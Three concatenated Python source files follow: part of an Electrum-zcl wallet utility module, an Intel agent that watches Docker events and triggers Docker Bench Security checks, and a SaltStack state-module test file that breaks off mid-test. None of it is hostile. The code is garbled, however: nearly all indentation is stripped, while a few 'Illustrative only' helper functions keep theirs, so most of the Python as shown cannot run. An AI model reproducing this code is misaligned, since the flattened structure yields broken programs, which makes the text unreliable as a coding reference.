class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
# Raise this exception to unwind the stack as when an error occurs;
# unlike other exceptions, the user will not be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
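# Usage sketch (function name illustrative):
#   @profiler
#   def load_transactions(path):
#       ...
# Each call then prints e.g. "[profiler] load_transactions 0.1234" to stderr.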
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum.electrum'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-zcl")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-zcl")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-zcl")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
x = int(x) # Some callers pass Decimal
scale_factor = pow (10, decimal_point)
integer_part = "{:n}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
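# Worked examples (assuming a '.' locale decimal point):
#   format_satoshis(123456789)              -> '1.23456789'
#   format_satoshis(50000000, is_diff=True) -> '+0.5'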
def timestamp_to_datetime(timestamp):
try:
return datetime.fromtimestamp(timestamp)
except:
return None
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
    elif distance_in_minutes < 43200:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
# For raw json, append /insight-api-zcash
mainnet_block_explorers = {
'ZclassicExplorer.com': ('http://zclassicexplorer.com',
{'tx': 'tx', 'addr': 'address'}),
'ZCLMine.pro': ('http://explorer.zclmine.pro',
{'tx': 'tx', 'addr': 'address'}),
'MyZCL.com': ('http://myzcl.com',
{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'})
}
# TODO zcl testnet block explorer
testnet_block_explorers = {
#'Blocktrail.com': ('https://www.blocktrail.com/tBTC',
#{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'})
}
def block_explorer_info():
from . import bitcoin
return testnet_block_explorers if bitcoin.NetworkConstants.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'ZclassicExplorer.com')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return "/".join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise BaseException("Not a Zclassic address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'bitcoin':
raise BaseException("Not a bitcoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise BaseException("Invalid Zclassic address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
        m = re.match(r'([0-9.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
    if 'message' in out:
        out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
        t.daemon = True
t.start()
return out
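# Illustrative only: the 'amount' query parameter accepted by parse_URI() is
# either a plain number of coins ("amount=1.23") or the "<value>X<exponent>"
# notation, which the code interprets as value * 10**(exponent - 8) base
# units. A standalone sketch of just that conversion (assumes COIN == 10**8,
# as in bitcoin.py):
def _demo_parse_uri_amount(am, coin=100000000):
    m = re.match(r'([0-9.]+)X([0-9])', am)
    if m:
        k = int(m.group(2)) - 8
        return int(Decimal(m.group(1)) * pow(Decimal(10), k))
    return int(Decimal(am) * coin)
# e.g. _demo_parse_uri_amount('1.23') -> 123000000, _demo_parse_uri_amount('123X8') -> 123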
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='bitcoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
    except Exception:
j = None
return j, message[n+1:]
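# Illustrative only: parse_json() implements simple newline-delimited JSON
# framing -- it peels one complete line off a byte buffer and returns the
# decoded object together with the unconsumed remainder (or (None, buffer)
# when no full line has arrived yet). A minimal sketch, not called anywhere:
def _demo_parse_json():
    import json as _json
    buf = _json.dumps({"id": 1, "method": "server.version"}).encode('utf8') + b'\n' + b'{"id": 2'
    msg, rest = parse_json(buf)
    assert msg == {"id": 1, "method": "server.version"}
    assert rest == b'{"id": 2'                 # incomplete message stays buffered
    assert parse_json(rest) == (None, rest)    # nothing to decode until '\n' arrives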
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
except OSError as e:
print_error("OSError", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
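# Illustrative only: two QueuePipe instances can be cross-wired (each one's
# send_queue is the other's get_queue) to emulate a client/server connection
# in-process, e.g. for tests, without any sockets. A minimal sketch:
def _demo_queue_pipe_loopback():
    a_to_b, b_to_a = queue.Queue(), queue.Queue()
    client = QueuePipe(send_queue=a_to_b, get_queue=b_to_a)
    server = QueuePipe(send_queue=b_to_a, get_queue=a_to_b)
    client.send({'id': 0, 'method': 'ping'})
    assert server.get() == {'id': 0, 'method': 'ping'}
    server.send_all([{'id': 0, 'result': 'pong'}])
    assert client.get_all() == [{'id': 0, 'result': 'pong'}]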
def get_cert_path():
if is_bundle and is_macOS:
# set in ./electrum
return requests.utils.DEFAULT_CA_BUNDLE_PATH
return requests.certs.where()
|
event_watcher.py
|
"""
Agent which monitors and reports the state of critical components of the framework
Copyright (C) 2017-2022 Intel Corporation
SPDX-License-Identifier: Apache-2.0
"""
import logging
from threading import Thread
from .constants import EVENTS_CHANNEL
from .constants import REMEDIATION_CONTAINER_CHANNEL
from .constants import REMEDIATION_IMAGE_CHANNEL
from .constants import TRTL_EVENTS
from .constants import DEFAULT_DBS_MODE
from .config_dbs import ConfigDbs
from .docker_bench_security_runner import DockerBenchRunner
from inbm_common_lib.shell_runner import PseudoShellRunner
logger = logging.getLogger(__name__)
current_dbs_mode = DEFAULT_DBS_MODE
class EventWatcher(Thread):
"""Starts up a thread to watch for events coming from Docker"""
def __init__(self, broker):
Thread.__init__(self, name="dockerEventWatcher")
self._broker = broker
self.daemon = True
self._process = None
self._running = True
def run(self): # pragma: no cover
"""Runs the EventWatcher thread"""
self._process = PseudoShellRunner().get_process(TRTL_EVENTS)
logger.debug(f'Watching for Docker events on PID: {self._process.pid}')
self._parse_process_output(self._process)
logger.debug("Event Watcher thread exited")
def set_dbs_mode(self, mode_value):
global current_dbs_mode
current_dbs_mode = mode_value
logger.debug(f"Current DBS mode is set to - {current_dbs_mode}")
def run_docker_bench_security(self): # pragma: no cover
"""Launch Docker Bench Security in separate thread."""
def run():
if current_dbs_mode != ConfigDbs.OFF:
dbs = DockerBenchRunner()
logger.debug(f"DBS mode : {current_dbs_mode} , Launching DBS checks...")
dbs.start()
dbs.join()
if current_dbs_mode == ConfigDbs.ON:
logger.debug("Parsing DBS result after DBS check. . .")
self._parse_dbs_result(dbs.result, dbs)
else:
                    logger.debug(
                        "Failed Images and Containers are not terminated since "
                        "DBS is set to - {}".format(current_dbs_mode))
else:
logger.debug(
"DBS check will not run, since DBS is turned OFF. Mode : {}"
.format(current_dbs_mode))
thread = Thread(target=run)
thread.daemon = True
thread.start()
def _check_failed_containers(self, failed_containers: str) -> None:
logger.debug("Passing failed containers on REMEDIATION_CONTAINER_CHANNEL")
        if failed_containers:
self._broker.publish(REMEDIATION_CONTAINER_CHANNEL, str(failed_containers))
def _check_failed_images(self, failed_images: str) -> None:
logger.debug("Passing failed images on REMEDIATION_IMAGE_CHANNEL")
        if failed_images:
self._broker.publish(REMEDIATION_IMAGE_CHANNEL,
str(failed_images))
def _parse_dbs_result(self, result, dbs):
if result is not None:
failed_containers = dbs.failed_container_list
failed_images = dbs.failed_image_list
result_string = dbs.result_string
self._check_failed_containers(failed_containers)
self._check_failed_images(failed_images)
self._broker.publish(
EVENTS_CHANNEL, "Docker Bench Security results: " + result_string)
else:
self._broker.publish(EVENTS_CHANNEL, "Unable to run Docker Bench Security")
@staticmethod
def _output_ended(next_line, process):
        return next_line == '' and process.poll() is not None
def _process_output(self, events, next_line):
if len(events) < 3:
logger.debug(
" ".join(TRTL_EVENTS) +
" command unexpected line (not enough fields): [" +
next_line + "]")
else:
event_type = events[2]
obj_id = events[1]
action = events[0]
logger.info(action + " on " + event_type + " with id " + obj_id)
            if action.strip() == 'start' and event_type.strip() == 'container' \
                    and len(events) > 3 and 'docker-bench-security' not in events[3]:
logger.debug('DBS check triggered via action: ' +
action.strip() + ' event: ' + event_type.strip())
self.run_docker_bench_security()
logger.debug(" ".join(TRTL_EVENTS) + " command done processing.")
def _parse_process_output(self, process):
while self._running:
logger.debug(" ".join(TRTL_EVENTS) + " command output log start.")
# we filter out bad characters but still accept the rest of the string
# here based on experience running the underlying command
next_line = process.stdout.readline().decode('utf-8', errors='replace')
if self._output_ended(next_line, process):
break
logger.debug(" ".join(TRTL_EVENTS) + " command output log: [" + next_line + "]")
events = next_line.split('\t')
self._process_output(events, next_line)
def stop(self):
"""Stop event watcher"""
self._running = False
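# Illustrative only: a standalone sketch of the tab-separated line layout that
# _parse_process_output()/_process_output() expect from the TRTL events
# command -- action, object id, object type, then any further fields (such as
# the container name). The sample line in the trailing comment is made up for
# illustration.
def _demo_split_event_line(next_line: str):
    events = next_line.split('\t')
    if len(events) < 3:
        return None
    return {'action': events[0].strip(), 'id': events[1].strip(), 'type': events[2].strip()}
# _demo_split_event_line('start\t1a2b3c\tcontainer\tmy-service\n')
# -> {'action': 'start', 'id': '1a2b3c', 'type': 'container'}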
|
test_state.py
|
# -*- coding: utf-8 -*-
# Import Python libs
from __future__ import absolute_import, print_function, unicode_literals
import logging
import os
import shutil
import sys
import tempfile
import textwrap
import threading
import time
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.helpers import with_tempdir, flaky
from tests.support.unit import skipIf
from tests.support.paths import BASE_FILES, TMP, TMP_PILLAR_TREE, TMP_STATE_TREE
from tests.support.mixins import SaltReturnAssertsMixin
# Import Salt libs
import salt.utils.atomicfile
import salt.utils.files
import salt.utils.path
import salt.utils.platform
import salt.utils.stringutils
from salt.modules.virtualenv_mod import KNOWN_BINARY_NAMES
# Import 3rd-party libs
from salt.ext import six
log = logging.getLogger(__name__)
DEFAULT_ENDING = salt.utils.stringutils.to_bytes(os.linesep)
def trim_line_end(line):
'''
Remove CRLF or LF from the end of line.
'''
if line[-2:] == salt.utils.stringutils.to_bytes('\r\n'):
return line[:-2]
elif line[-1:] == salt.utils.stringutils.to_bytes('\n'):
return line[:-1]
raise Exception("Invalid line ending")
def reline(source, dest, force=False, ending=DEFAULT_ENDING):
'''
Normalize the line endings of a file.
'''
fp, tmp = tempfile.mkstemp()
os.close(fp)
with salt.utils.files.fopen(tmp, 'wb') as tmp_fd:
with salt.utils.files.fopen(source, 'rb') as fd:
lines = fd.readlines()
for line in lines:
line_noend = trim_line_end(line)
tmp_fd.write(line_noend + ending)
if os.path.exists(dest) and force:
os.remove(dest)
os.rename(tmp, dest)
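# Illustrative only: the same CRLF/LF normalization reline() performs, sketched
# with plain builtins instead of salt.utils.files/tempfile, for readers who are
# unfamiliar with the salt helpers (the tests themselves keep using reline()).
def _demo_normalize_endings(source, dest, ending=DEFAULT_ENDING):
    with open(source, 'rb') as src, open(dest, 'wb') as dst:
        for line in src.read().splitlines():
            dst.write(line + ending)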
class StateModuleTest(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the state module
'''
maxDiff = None
@classmethod
def setUpClass(cls):
def _reline(path, ending=DEFAULT_ENDING):
'''
Normalize the line endings of a file.
'''
with salt.utils.files.fopen(path, 'rb') as fhr:
lines = fhr.read().splitlines()
with salt.utils.atomicfile.atomic_open(path, 'wb') as fhw:
for line in lines:
fhw.write(line + ending)
destpath = os.path.join(BASE_FILES, 'testappend', 'firstif')
_reline(destpath)
destpath = os.path.join(BASE_FILES, 'testappend', 'secondif')
_reline(destpath)
cls.TIMEOUT = 600 if salt.utils.platform.is_windows() else 10
def test_show_highstate(self):
'''
state.show_highstate
'''
high = self.run_function('state.show_highstate')
destpath = os.path.join(TMP, 'testfile')
self.assertTrue(isinstance(high, dict))
self.assertTrue(destpath in high)
self.assertEqual(high[destpath]['__env__'], 'base')
def test_show_lowstate(self):
'''
state.show_lowstate
'''
low = self.run_function('state.show_lowstate')
self.assertTrue(isinstance(low, list))
self.assertTrue(isinstance(low[0], dict))
def test_show_states(self):
'''
state.show_states
'''
states = self.run_function('state.show_states')
self.assertTrue(isinstance(states, list))
self.assertTrue(isinstance(states[0], six.string_types))
states = self.run_function('state.show_states', sorted=False)
self.assertTrue(isinstance(states, list))
self.assertTrue(isinstance(states[0], six.string_types))
def test_show_states_missing_sls(self):
'''
Test state.show_states with a sls file
defined in a top file is missing
'''
with salt.utils.files.fopen(os.path.join(TMP_STATE_TREE, 'top.sls'), 'w') as top_file:
top_file.write(textwrap.dedent('''\
base:
'*':
- doesnotexist
'''))
states = self.run_function('state.show_states')
assert isinstance(states, list)
assert states == ["No matching sls found for 'doesnotexist' in env 'base'"]
def test_catch_recurse(self):
'''
state.show_sls used to catch a recursive ref
'''
err = self.run_function('state.sls', mods='recurse_fail')
self.assertIn('recursive', err[0])
def test_no_recurse(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok')
self.assertIn('snmpd', sls)
def test_no_recurse_two(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok_two')
self.assertIn('/etc/nagios/nrpe.cfg', sls)
def test_running_dictionary_consistency(self):
'''
Test the structure of the running dictionary so we don't change it
without deprecating/documenting the change
'''
running_dict_fields = [
'__id__',
'__run_num__',
'__sls__',
'changes',
'comment',
'duration',
'name',
'result',
'start_time',
]
sls = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
for state, ret in sls.items():
for field in running_dict_fields:
self.assertIn(field, ret)
def test_running_dictionary_key_sls(self):
'''
Ensure the __sls__ key is either null or a string
'''
sls1 = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
sls2 = self.run_function('state.sls', mods='gndn')
for state, ret in sls1.items():
self.assertTrue(isinstance(ret['__sls__'], type(None)))
for state, ret in sls2.items():
self.assertTrue(isinstance(ret['__sls__'], six.string_types))
def _remove_request_cache_file(self):
'''
remove minion state request file
'''
cache_file = os.path.join(self.get_config('minion')['cachedir'], 'req_state.p')
if os.path.exists(cache_file):
os.remove(cache_file)
def test_request(self):
'''
verify sending a state request to the minion(s)
'''
self._remove_request_cache_file()
ret = self.run_function('state.request', mods='modules.state.requested')
result = ret['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_check_request(self):
'''
verify checking a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.check_request')
result = ret['default']['test_run']['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_clear_request(self):
'''
verify clearing a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.clear_request')
self.assertTrue(ret)
def test_run_request_succeeded(self):
'''
verify running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
if salt.utils.platform.is_windows():
self.run_function('state.request', mods='modules.state.requested_win')
else:
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.run_request')
if salt.utils.platform.is_windows():
key = 'cmd_|-count_root_dir_contents_|-Get-ChildItem C:\\\\ | Measure-Object | %{$_.Count}_|-run'
else:
key = 'cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run'
result = ret[key]['result']
self.assertTrue(result)
def test_run_request_failed_no_request_staged(self):
'''
verify not running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
self.run_function('state.clear_request')
ret = self.run_function('state.run_request')
self.assertEqual(ret, {})
@with_tempdir()
def test_issue_1896_file_append_source(self, base_dir):
'''
Verify that we can append a file's contents
'''
testfile = os.path.join(base_dir, 'test.append')
ret = self.run_state('file.touch', name=testfile)
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/firstif')
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/secondif')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
contents = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = contents.splitlines()
contents = os.linesep.join(new_contents)
contents += os.linesep
self.assertMultiLineEqual(contents, testfile_contents)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/secondif')
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/firstif')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(contents, testfile_contents)
def test_issue_1876_syntax_error(self):
'''
verify that we catch the following syntax error::
/tmp/salttest/issue-1876:
file:
- managed
- source: salt://testfile
file.append:
- text: foo
'''
testfile = os.path.join(TMP, 'issue-1876')
sls = self.run_function('state.sls', mods='issue-1876')
self.assertIn(
'ID \'{0}\' in SLS \'issue-1876\' contains multiple state '
'declarations of the same type'.format(testfile),
sls
)
def test_issue_1879_too_simple_contains_check(self):
expected = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = expected.splitlines()
expected = os.linesep.join(new_contents)
expected += os.linesep
testfile = os.path.join(TMP, 'issue-1879')
        # Delete the file if it already exists
if os.path.isfile(testfile):
os.unlink(testfile)
# Create the file
ret = self.run_function('state.sls', mods='issue-1879', timeout=120)
self.assertSaltTrueReturn(ret)
# The first append
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
# The second append
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
# Does it match?
try:
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
# Make sure we don't re-append existing text
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
